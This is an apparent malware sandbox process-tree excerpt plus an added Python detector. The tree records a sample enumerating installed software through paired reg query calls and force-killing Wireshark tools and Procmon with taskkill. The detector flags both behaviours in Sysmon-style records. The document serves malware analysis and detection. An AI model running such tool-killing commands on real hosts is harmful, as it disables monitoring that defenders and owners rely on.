    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1768
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1564
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1520
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1584
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 528
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 760
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1904
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 456
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 464
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1180
C:\Windows\System32\taskkill.exe | "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F | depth 2 | PID 1036
    Signature: Kills process with taskkill
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 2000
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 2040
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1920
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1164
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1500
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1072
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1976
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1388
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1792
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1012
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 2032
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1804
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1344
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1968
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 2028
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1664
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1924
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1900
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1840
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1520
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1856
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1880
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1904
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1620
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1812
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1180
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 740
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1396
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1864
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1548
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 2040
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1560
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1592
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1072
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1484
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1948
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1340
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 2032
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1956
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 368
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 304
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1164
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1784
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64 | depth 3 | PID 1816
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32 | depth 3 | PID 1564
C:\Windows\System32\taskkill.exe | "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F | depth 2 | PID 1612
    Signature: Kills process with taskkill
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1572
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64 | depth 3 | PID 1544
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32 | depth 3 | PID 1472
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1012
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64 | depth 3 | PID 1968
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32 | depth 3 | PID 1480
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1780
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64 | depth 3 | PID 1900
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32 | depth 3 | PID 1932
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1228
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64 | depth 3 | PID 1732
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32 | depth 3 | PID 1904
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1556
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64 | depth 3 | PID 1052
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32 | depth 3 | PID 740
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1456
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64 | depth 3 | PID 1860
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32 | depth 3 | PID 1628
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1560
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64 | depth 3 | PID 1076
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32 | depth 3 | PID 1460
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1948
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64 | depth 3 | PID 1476
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32 | depth 3 | PID 2020
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1504
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64 | depth 3 | PID 304
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32 | depth 3 | PID 456
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1952
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64 | depth 3 | PID 1564
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32 | depth 3 | PID 1056
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 672
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64 | depth 3 | PID 1472
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32 | depth 3 | PID 1912
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 2012
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64 | depth 3 | PID 1612
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32 | depth 3 | PID 1060
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1968
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64 | depth 3 | PID 1768
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32 | depth 3 | PID 1520
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1932
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64 | depth 3 | PID 1828
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32 | depth 3 | PID 1616
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1512
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64 | depth 3 | PID 1052
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32 | depth 3 | PID 1864
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 824
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64 | depth 3 | PID 1628
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32 | depth 3 | PID 1388
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1484
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64 | depth 3 | PID 2032
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32 | depth 3 | PID 1476
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 528
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64 | depth 3 | PID 1672
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32 | depth 3 | PID 456
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 844
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64 | depth 3 | PID 1516
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32 | depth 3 | PID 2028
C:\Windows\System32\taskkill.exe | "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F | depth 2 | PID 1472
    Signature: Kills process with taskkill
C:\Windows\System32\taskkill.exe | "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F | depth 2 | PID 1552
    Signature: Kills process with taskkill
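Added example, not part of the sandbox report and not code from the sample: Python detection logic, run over constructed Sysmon-style process-creation records, for the two behaviours this part of the tree shows. Every product under the Uninstall key is queried from a throwaway cmd.exe, once with /reg:64 and once with /reg:32 (the 32-bit view is the WOW6432Node mirror, so a sample that wants the full inventory on a 64-bit host has to ask twice), and taskkill /IM ... /T /F is aimed at the Wireshark tool set (wireshark, tshark, text2pcap, rawshark, dumpcap, capinfos) and Procmon. The record field names (guid, parent_guid, pid, image, cmd), the GUID strings, the PIDs, the java.exe command line and the threshold of five distinct product keys are assumptions made for the example; the ATT&CK mapping (T1518 Software Discovery, T1562.001 Impair Defenses: Disable or Modify Tools) is the editor's, not the report's.

```python
r"""Added detection for the two behaviours in the tree above: many reg query
calls under HKLM\...\CurrentVersion\Uninstall\<product> in both registry views
(software discovery, ATT&CK T1518) and taskkill /IM against capture and
monitoring tools (Impair Defenses: Disable or Modify Tools, T1562.001).
Records are Sysmon-style Event ID 1 fields; the sample in constructed_events()
is constructed to mirror the tree above and is not report data."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Tools the sample terminated in the tree above; extend to your own tooling.
ANALYSIS_TOOLS = {"wireshark.exe", "tshark.exe", "text2pcap.exe", "rawshark.exe",
                  "dumpcap.exe", "capinfos.exe", "procmon.exe"}
UNINSTALL_KEY = r"HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall"
# reg query "<UNINSTALL_KEY>\<product>" /reg:64   (reg may carry a full path)
REG_QUERY_RE = re.compile(r'^\s*(?:"?[^"\s]*\\)?reg(?:\.exe)?"?\s+query\s+"'
                          + re.escape(UNINSTALL_KEY) + r'\\([^"]+)"\s+/reg:(32|64)\s*$',
                          re.IGNORECASE)
TASKKILL_RE = re.compile(r'taskkill(?:\.exe)?"?\s+(?P<args>.*)$', re.IGNORECASE)
IM_RE = re.compile(r'/IM\s+"?([^"\s]+)"?', re.IGNORECASE)


def parse_reg_query(cmdline):
    """(product_subkey, view) for a query under the Uninstall key, else None."""
    m = REG_QUERY_RE.match(cmdline)
    return (m.group(1), m.group(2)) if m else None


def parse_taskkill(cmdline):
    """(target_image, forced, with_tree) for taskkill /IM, else None."""
    m = TASKKILL_RE.search(cmdline)
    im = IM_RE.search(m.group("args")) if m else None
    if not im:
        return None
    flags = {tok.upper() for tok in m.group("args").split() if tok.startswith("/")}
    return im.group(1).lower(), "/F" in flags, "/T" in flags


def origin_of(rec, by_guid):
    """Walk past cmd.exe wrappers to the process that actually drove the activity."""
    cur, hops = by_guid.get(rec["parent_guid"]), 0
    while cur and PureWindowsPath(cur["image"]).name.lower() == "cmd.exe" and hops < 16:
        cur, hops = by_guid.get(cur["parent_guid"]), hops + 1
    return cur


def detect(events, min_keys=5):
    """Attribute by ProcessGuid, not PID: the tree above reuses PIDs (1544, 1904)
    within seconds, so counting per PID would split or merge unrelated activity."""
    by_guid = {e["guid"]: e for e in events}
    queries = defaultdict(lambda: {"keys": set(), "views": set()})
    kills = []
    for e in events:
        origin = origin_of(e, by_guid)
        origin_guid = origin["guid"] if origin else e["parent_guid"]
        q = parse_reg_query(e["cmd"])
        if q is not None:
            queries[origin_guid]["keys"].add(q[0].lower())
            queries[origin_guid]["views"].add(q[1])
            continue
        k = parse_taskkill(e["cmd"])
        if k is not None and k[0] in ANALYSIS_TOOLS:
            kills.append({"pid": e["pid"], "target": k[0], "forced": k[1],
                          "origin_guid": origin_guid})
    discovery = [{"origin_guid": g, "origin_image": by_guid[g]["image"] if g in by_guid else None,
                  "distinct_keys": len(v["keys"]), "both_views": v["views"] == {"32", "64"}}
                 for g, v in queries.items() if len(v["keys"]) >= min_keys]
    return {"software_discovery": discovery, "tool_kills": kills}


def _ev(guid, parent_guid, pid, image, cmd):
    return {"guid": guid, "parent_guid": parent_guid, "pid": pid, "image": image, "cmd": cmd}


def constructed_events():
    """Constructed sample shaped like the tree above (not the report's records)."""
    ev = [_ev("g-explorer", None, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
          _ev("g-java", "g-explorer", 1204, r"C:\Users\Admin\Oracle\bin\java.exe",
              'java.exe -jar "New Banking Details.jar"')]
    pid = 1500
    for i, prod in enumerate(["MozillaMaintenanceService", "MPlayer2", "Office14.PROPLUS",
                              "SchedulingAgent", "VLC media player", "WIC"]):
        ev.append(_ev(f"g-cmd-{i}", "g-java", pid, r"C:\Windows\system32\cmd.exe", "cmd.exe"))
        for view in ("64", "32"):  # one cmd.exe per product, queried in both views
            pid += 4
            ev.append(_ev(f"g-reg-{i}-{view}", f"g-cmd-{i}", pid, r"C:\Windows\system32\reg.exe",
                          f'reg query "{UNINSTALL_KEY}\\{prod}" /reg:{view}'))
        pid += 4
    ev += [_ev("g-kill-1", "g-java", 1600, r"C:\Windows\System32\taskkill.exe",
               r'"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F'),
           _ev("g-kill-2", "g-java", 1604, r"C:\Windows\System32\taskkill.exe",
               r'"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F'),
           # Benign: an admin shell (reusing PID 1544 of an earlier reg.exe) does one
           # lookup and kills notepad; neither must fire.
           _ev("g-admin-cmd", "g-explorer", 1544, r"C:\Windows\system32\cmd.exe", "cmd.exe"),
           _ev("g-admin-reg", "g-admin-cmd", 1700, r"C:\Windows\system32\reg.exe",
               f'reg query "{UNINSTALL_KEY}\\Google Chrome" /reg:64'),
           _ev("g-admin-kill", "g-admin-cmd", 1704, r"C:\Windows\System32\taskkill.exe",
               "taskkill /IM notepad.exe /F")]
    return ev


SAMPLE_EVENTS = constructed_events()

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Two design points a practitioner should keep. First, a single `reg query` under the Uninstall key is read-only and routine for inventory agents and help-desk scripts, so the signal is the burst of distinct product keys from one origin, each asked for in both views, with that origin being a JVM running out of a user profile; the threshold is a tuning knob, not a fact about the sample. Second, attribution has to follow the parent chain through the disposable cmd.exe wrappers and key on ProcessGuid rather than PID: the tree above hands PIDs 1544 and 1904 to several unrelated processes within the run, and a per-PID count would scatter the activity.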